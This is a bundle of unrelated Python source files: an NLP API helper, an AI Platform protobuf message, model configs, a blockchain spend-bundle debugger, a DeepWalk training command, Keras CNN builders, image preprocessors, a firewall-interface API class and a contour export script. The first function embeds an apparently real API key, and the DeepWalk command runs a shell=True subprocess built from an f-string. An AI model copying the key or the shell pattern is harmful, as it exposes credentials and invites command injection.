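# in the transcript produce invalid JSON, and error objects from different
# sentences are not comma-separated. A safer sketch (same inputs, illustrative
# only) would accumulate plain dicts and serialize once at the end:
#   out = {'sections': [], 'stats': {}}
#   for section in sections:
#       out['sections'].append({'question': ..., 'response': ..., ...})
#   return out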
def getTextAnalytics(text):
alchemy_language = AlchemyLanguageV1(api_key='2a244174a9a41c43e449cf387a107093e50bdd64')
combined_operations = ['entity', 'keyword', 'concept', 'doc-emotion', 'doc-sentiment']
return alchemy_language.combined(text=text, extract=combined_operations)
|
# -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import proto # type: ignore
from google.protobuf import timestamp_pb2 # type: ignore
__protobuf__ = proto.module(
package='google.cloud.aiplatform.v1',
manifest={
'Event',
},
)
class Event(proto.Message):
r"""An edge describing the relationship between an Artifact and
an Execution in a lineage graph.
Attributes:
artifact (str):
Required. The relative resource name of the
Artifact in the Event.
execution (str):
Output only. The relative resource name of
the Execution in the Event.
event_time (google.protobuf.timestamp_pb2.Timestamp):
Output only. Time the Event occurred.
type_ (google.cloud.aiplatform_v1.types.Event.Type):
Required. The type of the Event.
labels (Sequence[google.cloud.aiplatform_v1.types.Event.LabelsEntry]):
The labels with user-defined metadata to
annotate Events.
Label keys and values can be no longer than 64
characters (Unicode codepoints), can only
contain lowercase letters, numeric characters,
underscores and dashes. International characters
are allowed. No more than 64 user labels can be
associated with one Event (System labels are
excluded).
See https://goo.gl/xmQnxf for more information
and examples of labels. System reserved label
keys are prefixed with
"aiplatform.googleapis.com/" and are immutable.
"""
class Type(proto.Enum):
r"""Describes whether an Event's Artifact is the Execution's
input or output.
"""
TYPE_UNSPECIFIED = 0
INPUT = 1
OUTPUT = 2
artifact = proto.Field(
proto.STRING,
number=1,
)
execution = proto.Field(
proto.STRING,
number=2,
)
event_time = proto.Field(
proto.MESSAGE,
number=3,
message=timestamp_pb2.Timestamp,
)
type_ = proto.Field(
proto.ENUM,
number=4,
enum=Type,
)
labels = proto.MapField(
proto.STRING,
proto.STRING,
number=5,
)
__all__ = tuple(sorted(__protobuf__.manifest))
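# Example construction (hypothetical resource names; proto-plus messages
# accept their fields as keyword arguments):
#   event = Event(
#       artifact='projects/p/locations/l/metadataStores/s/artifacts/a',
#       type_=Event.Type.INPUT,
#   )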
|
model_config = {
'vae_mid': 20,
'num_words': 35285,
'vocab_size': 35285,
'bow_mid_hid': 512,
'seq_mid_hid': 512,
'seq_len': 100,
'num_heads': 8,
'dropout': 1,
    'is_training': True
}
data_config = {
'data_path': 'data/data.bin',
'vocabulary_path': 'data/vocabulary.json',
'stop_words_path': 'data/stop_words'
}
train_config = {
'batch_size': 2000,
'epochs': 1000,
'lr': 3e-3,
'clip_grad': 20,
'save_step' : 100,
'checkpoint_path': 'checkpoint/'
}
eval_config = {
'batch_size': 1000,
}
|
from typing import List, Tuple
from blspy import AugSchemeMPL
from clvm import KEYWORD_FROM_ATOM
from clvm_tools.binutils import disassemble as bu_disassemble
from sector.types.blockchain_format.coin import Coin
from sector.types.blockchain_format.program import Program, INFINITE_COST
from sector.types.blockchain_format.sized_bytes import bytes32
from sector.types.condition_opcodes import ConditionOpcode
from sector.util.condition_tools import conditions_dict_for_solution, pkm_pairs_for_conditions_dict
from sector.util.hash import std_hash
CONDITIONS = dict((k, bytes(v)[0]) for k, v in ConditionOpcode.__members__.items()) # pylint: disable=E1101
KFA = {v: k for k, v in CONDITIONS.items()}
# information needed to spend a cc
# if we ever support more genesis conditions, like a re-issuable coin,
# we may need also to save the `genesis_coin_mod` or its hash
def disassemble(sexp):
"""
This version of `disassemble` also disassembles condition opcodes like `ASSERT_ANNOUNCEMENT_CONSUMED`.
"""
kfa = dict(KEYWORD_FROM_ATOM)
kfa.update((Program.to(k).as_atom(), v) for k, v in KFA.items())
return bu_disassemble(sexp, kfa)
def coin_as_program(coin: Coin) -> Program:
"""
Convenience function for when putting `coin_info` into a solution.
"""
return Program.to([coin.parent_coin_info, coin.puzzle_hash, coin.amount])
def dump_coin(coin: Coin) -> str:
return disassemble(coin_as_program(coin))
def debug_spend_bundle(spend_bundle, agg_sig_additional_data=bytes([3] * 32)) -> None:
"""
Print a lot of useful information about a `SpendBundle` that might help with debugging
its clvm.
"""
pks = []
msgs = []
created_coin_announcements: List[List[bytes]] = []
asserted_coin_announcements = []
created_puzzle_announcements: List[List[bytes]] = []
asserted_puzzle_announcements = []
print("=" * 80)
for coin_solution in spend_bundle.coin_solutions:
coin = coin_solution.coin
puzzle_reveal = Program.from_bytes(bytes(coin_solution.puzzle_reveal))
solution = Program.from_bytes(bytes(coin_solution.solution))
coin_name = coin.name()
if puzzle_reveal.get_tree_hash() != coin_solution.coin.puzzle_hash:
print("*** BAD PUZZLE REVEAL")
print(f"{puzzle_reveal.get_tree_hash().hex()} vs {coin_solution.coin.puzzle_hash.hex()}")
print("*" * 80)
breakpoint()
continue
print(f"consuming coin {dump_coin(coin)}")
print(f" with id {coin_name}")
print()
print(f"\nbrun -y main.sym '{bu_disassemble(puzzle_reveal)}' '{bu_disassemble(solution)}'")
error, conditions, cost = conditions_dict_for_solution(puzzle_reveal, solution, INFINITE_COST)
if error:
print(f"*** error {error}")
elif conditions is not None:
for pk, m in pkm_pairs_for_conditions_dict(conditions, coin_name, agg_sig_additional_data):
pks.append(pk)
msgs.append(m)
print()
cost, r = puzzle_reveal.run_with_cost(INFINITE_COST, solution) # type: ignore
print(disassemble(r))
print()
if conditions and len(conditions) > 0:
print("grouped conditions:")
for condition_programs in conditions.values():
print()
for c in condition_programs:
                    if len(c.vars) == 1:
                        as_prog = Program.to([c.opcode, c.vars[0]])
                    elif len(c.vars) == 2:
                        as_prog = Program.to([c.opcode, c.vars[0], c.vars[1]])
                    else:
                        # generic fallback so as_prog is always defined
                        as_prog = Program.to([c.opcode] + list(c.vars))
                    print(f"  {disassemble(as_prog)}")
created_coin_announcements.extend(
[coin_name] + _.vars for _ in conditions.get(ConditionOpcode.CREATE_COIN_ANNOUNCEMENT, [])
)
asserted_coin_announcements.extend(
[_.vars[0].hex() for _ in conditions.get(ConditionOpcode.ASSERT_COIN_ANNOUNCEMENT, [])]
)
created_puzzle_announcements.extend(
[puzzle_reveal.get_tree_hash()] + _.vars
for _ in conditions.get(ConditionOpcode.CREATE_PUZZLE_ANNOUNCEMENT, [])
)
asserted_puzzle_announcements.extend(
[_.vars[0].hex() for _ in conditions.get(ConditionOpcode.ASSERT_PUZZLE_ANNOUNCEMENT, [])]
)
print()
else:
print("(no output conditions generated)")
print()
print("-------")
created = set(spend_bundle.additions())
spent = set(spend_bundle.removals())
zero_coin_set = set(coin.name() for coin in created if coin.amount == 0)
ephemeral = created.intersection(spent)
created.difference_update(ephemeral)
spent.difference_update(ephemeral)
print()
print("spent coins")
for coin in sorted(spent, key=lambda _: _.name()):
print(f" {dump_coin(coin)}")
print(f" => spent coin id {coin.name()}")
print()
print("created coins")
for coin in sorted(created, key=lambda _: _.name()):
print(f" {dump_coin(coin)}")
print(f" => created coin id {coin.name()}")
if ephemeral:
print()
print("ephemeral coins")
for coin in sorted(ephemeral, key=lambda _: _.name()):
print(f" {dump_coin(coin)}")
print(f" => created coin id {coin.name()}")
created_coin_announcement_pairs = [(_, std_hash(b"".join(_)).hex()) for _ in created_coin_announcements]
if created_coin_announcement_pairs:
print("created coin announcements")
for announcement, hashed in sorted(created_coin_announcement_pairs, key=lambda _: _[-1]):
as_hex = [f"0x{_.hex()}" for _ in announcement]
print(f" {as_hex} =>\n {hashed}")
eor_coin_announcements = sorted(
set(_[-1] for _ in created_coin_announcement_pairs) ^ set(asserted_coin_announcements)
)
created_puzzle_announcement_pairs = [(_, std_hash(b"".join(_)).hex()) for _ in created_puzzle_announcements]
if created_puzzle_announcements:
print("created puzzle announcements")
for announcement, hashed in sorted(created_puzzle_announcement_pairs, key=lambda _: _[-1]):
as_hex = [f"0x{_.hex()}" for _ in announcement]
print(f" {as_hex} =>\n {hashed}")
eor_puzzle_announcements = sorted(
set(_[-1] for _ in created_puzzle_announcement_pairs) ^ set(asserted_puzzle_announcements)
)
print()
print()
print(f"zero_coin_set = {sorted(zero_coin_set)}")
print()
if created_coin_announcement_pairs or asserted_coin_announcements:
print(f"created coin announcements = {sorted([_[-1] for _ in created_coin_announcement_pairs])}")
print()
print(f"asserted coin announcements = {sorted(asserted_coin_announcements)}")
print()
print(f"symdiff of coin announcements = {sorted(eor_coin_announcements)}")
print()
if created_puzzle_announcement_pairs or asserted_puzzle_announcements:
print(f"created puzzle announcements = {sorted([_[-1] for _ in created_puzzle_announcement_pairs])}")
print()
print(f"asserted puzzle announcements = {sorted(asserted_puzzle_announcements)}")
print()
print(f"symdiff of puzzle announcements = {sorted(eor_puzzle_announcements)}")
print()
print()
print("=" * 80)
print()
validates = AugSchemeMPL.aggregate_verify(pks, msgs, spend_bundle.aggregated_signature)
print(f"aggregated signature check pass: {validates}")
print(f"pks: {pks}")
print(f"msgs: {[msg.hex() for msg in msgs]}")
print(f" msg_data: {[msg.hex()[:-128] for msg in msgs]}")
print(f" coin_ids: {[msg.hex()[-128:-64] for msg in msgs]}")
print(f" add_data: {[msg.hex()[-64:] for msg in msgs]}")
print(f"signature: {spend_bundle.aggregated_signature}")
def solution_for_pay_to_any(puzzle_hash_amount_pairs: List[Tuple[bytes32, int]]) -> Program:
output_conditions = [
[ConditionOpcode.CREATE_COIN, puzzle_hash, amount] for puzzle_hash, amount in puzzle_hash_amount_pairs
]
return Program.to(output_conditions)
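# Example (hypothetical puzzle hash and amount):
#   solution_for_pay_to_any([(bytes32(b'\x00' * 32), 1000)])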
|
import signal
import logging
import os
import shutil
import csv
import json
import datetime
import pickle
import gensim
import subprocess
import traceback
import networkx as nx
from django.core.management.base import BaseCommand, CommandError
from django.conf import settings
from rdflib.namespace import split_uri
from api.rdf.namespace import find_type
from os import listdir
from os.path import isfile, join, splitext, exists
from api.training.generate_graph import *
from api.training.evaluator import *
logger = logging.getLogger(__name__)
logging.getLogger('pykeen').setLevel(logging.INFO)
KGE_DIR = getattr(settings, 'KGE_DIR', None)
TRAINING_SET_DIR = getattr(settings, 'TRAINING_SET_DIR', None)
TEST_SET_DIR = getattr(settings, 'TEST_SET_DIR', None)
class Command(BaseCommand):
help = 'Training kg data using deepwalk'
def add_arguments(self, parser):
parser.add_argument('-m', '--model', type=str, default='sg', help='Preferred word2vec architecture, sg or cbow', )
parser.add_argument('-d', '--representation_size', type=int, default=128, help='Computed vector dimensions', )
parser.add_argument('-w', '--workers', type=int, default=30, help='Number of worker threads while training', )
parser.add_argument('-wl', '--walk_length', type=int, default=40, help='Random walk length', )
parser.add_argument('-n', '--number_walks', type=int, default=80, help='Number of walks', )
parser.add_argument('-s', '--window_size', type=int, default=10, help='Window size', )
parser.add_argument('-tn', '--testset_name', type=str, default='', help='testset name', )
parser.add_argument('-e', '--exp_name', type=str, default='', help='experiment name', )
parser.add_argument('-dg', '--directed', nargs='?', const=True, default=False, help='directed or undirected graph by default the graph is undirected', )
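        # Example invocation (command name is hypothetical; it comes from
        # this module's file name):
        #   python manage.py train_deepwalk -m sg -d 128 -tn my_testset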
def handle(self, *args, **options):
model = options['model']
representation_size = options['representation_size']
workers = options['workers']
walk_length = options['walk_length']
number_walks = options['number_walks']
window_size = options['window_size']
testset_name = options['testset_name']
directed = options['directed']
exp_name = options['exp_name']
try:
            annotation_files = [join(TRAINING_SET_DIR, file) for file in os.listdir(TRAINING_SET_DIR + '/.') if (file) and ('nt' in splitext(file)[1])]
axiom_files = [join(TRAINING_SET_DIR, file) for file in os.listdir(TRAINING_SET_DIR + '/.') if (file) and ('.ls' in splitext(file)[1])]
outdir = join(KGE_DIR, 'deepwalkrdf' + '-' + testset_name + '-' + (exp_name + '-' if exp_name else '') + str(datetime.date.today()))
os.makedirs(outdir, exist_ok=True)
os.chdir(outdir)
config = {
                'trainingset': annotation_files,
'axiom_files': axiom_files,
'model': 'deepwalkrdf',
'output_directory': outdir,
'representation_size': representation_size,
'walk_length': walk_length,
'number_walks': number_walks,
'window_size': window_size,
'workers': workers,
'testset_name': testset_name,
'directed': directed,
}
logger.info("Starting training dataset with settings:" + str(config))
            (graph, node_dict) = generate_deepwalk_graph(annotation_files, axiom_files)
if directed:
graph = graph.to_directed()
edgelist_outfile = "kb.edgelist"
nx.write_edgelist(graph, edgelist_outfile, data=False)
self.write_nodes_file(node_dict)
CMD = f'deepwalk --input {edgelist_outfile} --output karate.embeddings --workers {workers} \
--number-walks {number_walks} --representation-size {representation_size} --walk-length {walk_length} --window-size {window_size}'
process = subprocess.Popen(CMD, text=True, shell=True)
            if process.wait() != 0:
                raise CommandError('deepwalk subprocess failed')
self.generate_bio2vec_frmt(node_dict, outdir)
run_evaluation(outdir, join(TEST_SET_DIR, testset_name + '.tsv'), testset_name)
        except Exception:
            logger.exception('Training failed')
def generate_bio2vec_frmt(self, node_dict, outdir):
logger.info("Started generating bio2vec dataset file")
id2node_map = dict((v, k) for k, v in node_dict.items())
sep = ','
entity_emb_file = "karate.embeddings"
outFile = join(outdir, "embeddings.bio2vec.tsv")
with open(join(outdir, entity_emb_file), "r") as emb_file:
csv_reader = csv.reader(emb_file, delimiter=' ', )
next(csv_reader)
with open(outFile, 'w') as file:
writer = csv.writer(file, delimiter='\t')
for row in csv_reader:
key = id2node_map[int(row[0])]
local_name = ''
entity_type = 'entity'
try:
                        uri = key[1:-1]  # strip surrounding angle brackets from the node key
entity_type = find_type(uri)
key = uri
local_name = split_uri(uri)[1]
except Exception:
pass
row =[key, local_name, '', '', entity_type, sep.join(map(str, row[1:len(row)]))]
writer.writerow(row)
logger.info("Finished generating bio2vec dataset file")
def write_nodes_file(self, node_dict):
node_file = open("nodes.json", "w")
json.dump(node_dict, node_file, indent=4)
node_file.close()
|
#!/usr/bin/env python3
from flask import render_template, request, make_response, jsonify
from app import app
from app.mongo import mongodb
from . import admin
@admin.route('/setting', methods=['GET'])
def basicset_index():
collection = app.config.get('BASICSET_COLLECTION')
setting = mongodb[collection].find_one({"usageTag":"blog_setting"})
    blog_title = blog_keywords = blog_description = blog_tag = None
    if setting:
        blog_title = setting.get('blog_title')
        blog_keywords = setting.get('blog_keywords')
        blog_description = setting.get('blog_description')
        blog_tag = setting.get('blog_tag')
    return render_template('setting/index.html',
                           blog_title=blog_title,
                           blog_keywords=blog_keywords,
                           blog_description=blog_description,
                           blog_tag=blog_tag)
|
import tensorflow as tf
import tensorflow.keras as keras
def alexnet(input_shape, classes_num=100):
"""
AlexNet:
Described in: http://arxiv.org/pdf/1404.5997v2.pdf
Parameters from:
github.com/akrizhevsky/cuda-convnet2/blob/master/layers/
"""
# Creating initializer, optimizer and the regularizer ops
initializer = keras.initializers.RandomNormal(0.0, 0.01)
regularizer = keras.regularizers.l2(5e-4)
    # Both branches built the same tuple, so the shape passes through unchanged
    # for grayscale and RGB inputs alike.
    input_shape = (input_shape[0], input_shape[1], input_shape[2])
# Creating the model
model = tf.compat.v1.keras.Sequential(
[
keras.layers.Conv2D(
64, 11, 4,
padding='same',
activation=tf.nn.relu,
kernel_initializer=initializer,
kernel_regularizer=regularizer,
input_shape=input_shape,
data_format='channels_last'
),
keras.layers.MaxPooling2D(
2, 2, padding='valid'
),
keras.layers.Conv2D(
192, 5,
padding='same',
kernel_initializer=initializer,
kernel_regularizer=regularizer,
activation=tf.nn.relu
),
keras.layers.MaxPooling2D(
2, 2, padding='valid'
),
keras.layers.Conv2D(
384, 3,
padding='same',
kernel_initializer=initializer,
kernel_regularizer=regularizer,
activation=tf.nn.relu
),
keras.layers.Conv2D(
256, 3,
padding='same',
kernel_initializer=initializer,
kernel_regularizer=regularizer,
activation=tf.nn.relu
),
keras.layers.Conv2D(
256, 3,
padding='same',
kernel_initializer=initializer,
kernel_regularizer=regularizer,
activation=tf.nn.relu
),
keras.layers.MaxPooling2D(
2, 2, padding='valid'
),
keras.layers.Flatten(),
keras.layers.Dropout(0.3),
keras.layers.Dense(
classes_num,
kernel_initializer=initializer,
kernel_regularizer=regularizer,
activation=tf.nn.softmax
)
]
)
return model
def scheduler(epoch):
"""
Learning rate scheduler
"""
    lr = 0.0001
    # Check the larger epoch threshold first so both decay steps are reachable.
    if epoch > 60:
        lr = 0.000001
    elif epoch > 25:
        lr = 0.00001
print('Using learning rate', lr)
return lr
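# Example: plug the scheduler into training as a Keras callback (sketch with
# hypothetical training data):
#   lr_callback = keras.callbacks.LearningRateScheduler(scheduler)
#   model.fit(x_train, y_train, epochs=80, callbacks=[lr_callback])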
def create_model(model_name, input_shape, classes_num):
if model_name == "alexnet":
model = alexnet(input_shape, classes_num)
elif model_name == "vgg16":
# https://keras.io/zh/applications/
base_model = keras.applications.vgg16.VGG16(include_top=False, weights=None,
input_shape=input_shape)
x = base_model.output
x = keras.layers.GlobalAveragePooling2D()(x)
predictions = keras.layers.Dense(classes_num, activation="softmax")(x)
model = keras.models.Model(inputs=base_model.input, outputs=predictions)
elif model_name == "vgg19":
base_model = keras.applications.vgg19.VGG19(include_top=False, weights=None,
input_shape=input_shape)
x = base_model.output
x = keras.layers.GlobalAveragePooling2D()(x)
predictions = keras.layers.Dense(classes_num, activation="softmax")(x)
model = keras.models.Model(inputs=base_model.input, outputs=predictions)
else:
raise Exception("No such model: {}".format(model_name))
return model
|
"""
Copyright (c) 2019 Intel Corporation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import cv2
import numpy as np
from ..config import NumberField, BoolField
try:
import tensorflow as tf
except ImportError as import_error:
tf = None
from .preprocessor import Preprocessor
class BgrToRgb(Preprocessor):
__provider__ = 'bgr_to_rgb'
def process(self, image, annotation_meta=None):
def process_data(data):
return cv2.cvtColor(data, cv2.COLOR_BGR2RGB)
image.data = process_data(image.data) if not isinstance(image.data, list) else [
process_data(fragment) for fragment in image.data
]
return image
class BgrToGray(Preprocessor):
__provider__ = 'bgr_to_gray'
def process(self, image, annotation_meta=None):
image.data = np.expand_dims(cv2.cvtColor(image.data, cv2.COLOR_BGR2GRAY).astype(np.float32), -1)
return image
class RgbToBgr(Preprocessor):
__provider__ = 'rgb_to_bgr'
def process(self, image, annotation_meta=None):
def process_data(data):
return cv2.cvtColor(data, cv2.COLOR_RGB2BGR)
image.data = process_data(image.data) if not isinstance(image.data, list) else [
process_data(fragment) for fragment in image.data
]
return image
class RgbToGray(Preprocessor):
__provider__ = 'rgb_to_gray'
def process(self, image, annotation_meta=None):
image.data = np.expand_dims(cv2.cvtColor(image.data, cv2.COLOR_RGB2GRAY).astype(np.float32), -1)
return image
class TfConvertImageDType(Preprocessor):
__provider__ = 'tf_convert_image_dtype'
def __init__(self, config, name):
super().__init__(config, name)
if tf is None:
raise ImportError('*tf_convert_image_dtype* operation requires TensorFlow. Please install it before usage')
tf.enable_eager_execution()
self.converter = tf.image.convert_image_dtype
self.dtype = tf.float32
def process(self, image, annotation_meta=None):
converted_data = self.converter(image.data, dtype=self.dtype)
image.data = converted_data.numpy()
return image
class SelectInputChannel(Preprocessor):
__provider__ = 'select_channel'
@classmethod
def parameters(cls):
parameters = super().parameters()
parameters['channel'] = NumberField(value_type=int, min_value=0)
return parameters
def configure(self):
self.channel = self.get_value_from_config('channel')
def process(self, image, annotation_meta=None):
def process_data(data):
return data[:, :, self.channel, np.newaxis]
if isinstance(image.data, list):
image.data = [process_data(item) for item in image.data]
else:
image.data = process_data(image.data)
return image
class BGR2YUVConverter(Preprocessor):
__provider__ = 'bgr_to_yuv'
color = cv2.COLOR_BGR2YUV
@classmethod
def parameters(cls):
parameters = super().parameters()
parameters.update({
'split_channels': BoolField(
optional=True, default=False, description='Allow treat channels as independent input'
)
})
return parameters
def configure(self):
self.split_channels = self.get_value_from_config('split_channels')
def process(self, image, annotation_meta=None):
data = image.data
yuvdata = cv2.cvtColor(data, self.color)
if self.split_channels:
y = yuvdata[:, :, 0]
u = yuvdata[:, :, 1]
v = yuvdata[:, :, 2]
            identifier = image.identifier
new_identifier = ['{}_y'.format(identifier), '{}_u'.format(identifier), '{}_v'.format(identifier)]
yuvdata = [np.expand_dims(y, -1), np.expand_dims(u, -1), np.expand_dims(v, -1)]
image.identifier = new_identifier
image.data = yuvdata
return image
class RGB2YUVConverter(BGR2YUVConverter):
__provider__ = 'rgb_to_yuv'
color = cv2.COLOR_RGB2YUV
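# --- Hedged illustration (not part of the preprocessor API; `frame` is a
# placeholder BGR numpy array). The converters above are thin wrappers over
# cv2.cvtColor, equivalent to:
# rgb = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
# gray = np.expand_dims(
#     cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY).astype(np.float32), -1)
# yuv = cv2.cvtColor(frame, cv2.COLOR_BGR2YUV)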
|
"""Sub-interfaces Classes."""
from fmcapi.api_objects.apiclasstemplate import APIClassTemplate
from fmcapi.api_objects.device_services.devicerecords import DeviceRecords
from fmcapi.api_objects.object_services.securityzones import SecurityZones
from fmcapi.api_objects.device_services.physicalinterfaces import PhysicalInterfaces
import logging
class SubInterfaces(APIClassTemplate):
"""The Subinterface Object in the FMC."""
VALID_JSON_DATA = [
"id",
"name",
"type",
"mode",
"enabled",
"MTU",
"managementOnly",
"ipAddress",
"subIntfId",
"vlanId",
"macLearn",
"ifname",
"securityZone",
"arpConfig",
"ipv4",
"ipv6",
"macTable",
"enableAntiSpoofing",
"fragmentReassembly",
"enableDNSLookup",
"activeMACAddress",
"standbyMACAddress",
]
VALID_FOR_KWARGS = VALID_JSON_DATA + ["device_name"]
    VALID_CHARACTERS_FOR_NAME = r"""[.\w\d_\-\/\. ]"""
PREFIX_URL = "/devices/devicerecords"
URL_SUFFIX = None
REQUIRED_FOR_POST = ["name", "subIntfId", "MTU"]
REQUIRED_FOR_PUT = ["id", "device_id"]
VALID_FOR_IPV4 = ["static", "dhcp", "pppoe"]
VALID_FOR_MODE = ["INLINE", "PASSIVE", "TAP", "ERSPAN", "NONE"]
    VALID_FOR_MTU = range(64, 9001)  # inclusive of 9000, matching the warning message
def __init__(self, fmc, **kwargs):
"""
Initialize SubInterfaces object.
Set self.type to "SubInterface" and parse the kwargs.
:param fmc (object): FMC object
:param **kwargs: Any other values passed during instantiation.
:return: None
"""
super().__init__(fmc, **kwargs)
logging.debug("In __init__() for SubInterfaces class.")
self.parse_kwargs(**kwargs)
self.type = "SubInterface"
def parse_kwargs(self, **kwargs):
"""
Parse the kwargs and set self variables to match.
:return: None
"""
super().parse_kwargs(**kwargs)
logging.debug("In parse_kwargs() for SubInterfaces class.")
if "device_name" in kwargs:
self.device(device_name=kwargs["device_name"])
if "ipv4" in kwargs:
if list(kwargs["ipv4"].keys())[0] in self.VALID_FOR_IPV4:
self.ipv4 = kwargs["ipv4"]
else:
logging.warning(
f"""Method "{kwargs['ipv4']}" is not a valid ipv4 type."""
)
if "mode" in kwargs:
if kwargs["mode"] in self.VALID_FOR_MODE:
self.mode = kwargs["mode"]
else:
logging.warning(f"""Mode "{kwargs['mode']}" is not a valid mode.""")
if "MTU" in kwargs:
if kwargs["MTU"] in self.VALID_FOR_MTU:
self.MTU = kwargs["MTU"]
else:
logging.warning(
f"""MTU "{kwargs['MTU']}" should be in the range 64-9000."""
)
self.MTU = 1500
def device(self, device_name):
"""
Associate device to this subinterface.
:param device_name: (str) Name of device.
:return: None
"""
logging.debug("In device() for SubInterfaces class.")
device1 = DeviceRecords(fmc=self.fmc)
device1.get(name=device_name)
if "id" in device1.__dict__:
self.device_id = device1.id
self.URL = f"{self.fmc.configuration_url}{self.PREFIX_URL}/{self.device_id}/subinterfaces"
self.device_added_to_url = True
else:
logging.warning(
f'Device "{device_name}" not found. Cannot set up device for SubInterfaces.'
)
def sz(self, name):
"""
Assign Security Zone to this subinterface.
:param name: (str) Name of Security Zone.
:return: None
"""
logging.debug("In sz() for SubInterfaces class.")
sz = SecurityZones(fmc=self.fmc)
sz.get(name=name)
if "id" in sz.__dict__:
new_zone = {"name": sz.name, "id": sz.id, "type": sz.type}
self.securityZone = new_zone
else:
logging.warning(
f'Security Zone, "{name}", not found. Cannot add to SubInterfaces.'
)
def static(self, ipv4addr, ipv4mask):
"""
        Assign static IP to this subinterface.
:param ipv4addr: (str) x.x.x.x
:param ipv4mask: (str) bitmask
:return: None
"""
logging.debug("In static() for SubInterfaces class.")
self.ipv4 = {"static": {"address": ipv4addr, "netmask": ipv4mask}}
def dhcp(self, enableDefault=True, routeMetric=1):
"""
Configure this subinterface with DHCP for addressing.
:param enableDefault: (bool) Accept, or not, a default route via DHCP.
:param routeMetric: (int) Set route metric.
:return: None
"""
logging.debug("In dhcp() for SubInterfaces class.")
self.ipv4 = {
"dhcp": {
"enableDefaultRouteDHCP": enableDefault,
"dhcpRouteMetric": routeMetric,
}
}
def p_interface(self, p_interface, device_name):
"""
Define which physical interface on which device is a part of this subinterface.
        :param p_interface: (str) Name of physical interface.
:param device_name: (str) Name of device with that interface.
:return: None
"""
logging.debug("In p_interface() for SubInterfaces class.")
intf1 = PhysicalInterfaces(fmc=self.fmc)
intf1.get(name=p_interface, device_name=device_name)
if "id" in intf1.__dict__:
self.name = intf1.name
if "MTU" not in self.__dict__:
self.MTU = intf1.MTU
        else:
            logging.warning(
                f'PhysicalInterface, "{p_interface}", not found. Cannot add to SubInterfaces.'
            )
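# --- Hedged usage sketch (device, interface, and zone names are invented;
# assumes an authenticated fmcapi.FMC session as in the fmcapi examples):
# import fmcapi
# with fmcapi.FMC(host="fmc.example.com", username="apiuser",
#                 password="secret", autodeploy=False) as fmc1:
#     sub = SubInterfaces(fmc=fmc1, device_name="ftd-1")
#     sub.p_interface(p_interface="GigabitEthernet0/0", device_name="ftd-1")
#     sub.subIntfId = 100
#     sub.vlanId = 100
#     sub.static(ipv4addr="10.0.100.1", ipv4mask="24")
#     sub.sz(name="inside")
#     sub.post()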
|
# -*- coding: utf-8 -*-
"""
Created on Thu Mar 18 19:04:04 2021
@author: Admin
"""
import os
import json
import cv2
from contouring_semantic_segmentation import *
# ignore the background since we do not want to contour the background!
# This assumes that it is jpeg
class_dictionary = {'concrete':1, 'steel':2, 'metal decking':3}
output_textfile_destination = "output.txt"
def make_ohev_list(one_hot_encoded_vector_dir):
ohev_list_array = []
for image_name in os.listdir(one_hot_encoded_vector_dir):
ohev_list_array.append(image_name)
return ohev_list_array
ohev_directory = './ohev/'
image_dir = './masks/'
ohev_list_array = make_ohev_list(ohev_directory)
complete_contours = {}
# expects a jpeg for the image file-type, but could easily be modified for a png
for image_name in ohev_list_array:
ohev_file_name = ohev_directory + image_name
image_file_name = image_dir + image_name.split('.')[-2]+'.png'
for class_name in class_dictionary:
complete_class_contours = contour_class(ohev_file_name, image_file_name, image_name, class_dictionary[class_name], class_name)
        if complete_class_contours is None:
print(class_name + ': not present on image')
else:
complete_contours[class_name] = complete_class_contours
# ------------------------------------------------------------------------
# TODO:
# CONVERT complete_contours TO JSON
# ------------------------------------------------------------------------
#print(complete_contours)
def keypoints_to_text(destination, keypoints, img):
#width, height = image.shape[0:2]
#condense_array_to_oneline = str(keypoints).replace('\n', '').replace(" ", "").replace("'", "").replace("array", "").replace("(", "").replace(")", "")
    VERSION_NUMBER = "4.5.6"
    with open(destination, 'w') as f:
        f.write("version:" + VERSION_NUMBER + "\n")
f.write("shapes:\n")
for index in keypoints:
pars = keypoints[index]
for i in range(len(pars)):
f.write("label:")
f.write(index)
f.write("\n")
f.write("points:")
for entry in pars[i]:
for x,y in entry:
f.write("[")
f.write(str(x))
f.write(",")
f.write(str(y))
f.write("]")
f.write("\n")
f.write("group_id:null\n")
f.write("shape_type:polygon\n")
f.write("flags:{}\n")
f.write("imagePath:")
f.write(image_file_name)
f.write("\n")
f.write("imageData:")
f.write("none\n")
        # cv2 image arrays are (rows, cols, channels), i.e. (height, width, channels)
        height, width, channels = img.shape
        f.write("imageHeight:")
        f.write(str(height))
        f.write("\n")
        f.write("imageWidth:")
        f.write(str(width))
        f.write("\n")
def text_to_json(destination, text_file):
dictionary = {}
shape_dict = {}
with open(text_file) as tr:
for line in tr:
key,data = line.strip().split(":",1)
print(key, " = ", data)
if key == "version":
dictionary[key] = data
elif key == "shapes":
dictionary.setdefault("shapes",[])
elif key == "points":
## TODO fix points to be int instead of string
#data = data.replace("[", "").replace("]", "")
points_list = data.replace("[","").split("]")
points_list.pop()
points = []
for item in points_list:
x,y = item.split(",")
points.append([float(x),float(y)])
shape_dict[key] = points
elif key == "flags":
shape_dict[key] = data
dictionary["shapes"].append(shape_dict)
shape_dict = {}
elif key == "imagePath":
dictionary[key] = data
elif key == "imageData":
dictionary[key] = data
elif key == "imageHeight":
dictionary[key] = int(data)
elif key == "imageWidth":
dictionary[key] = int(data)
else:
shape_dict[key] = data
    with open(destination, "w") as out_file:
        json.dump(dictionary, out_file, indent=4, sort_keys=False)
img = cv2.imread(image_file_name)
keypoints_to_text(output_textfile_destination, complete_contours, img)
text_to_json("out.json", "output.txt")
|
def getHistoricalTerminologyDict():
history_terminology = {
"Stone Age": [
"Stone Age",
"prehistoric",
"cave paintings",
"Paleolithic",
"Mesolithis",
"Neolithic",
"stone",
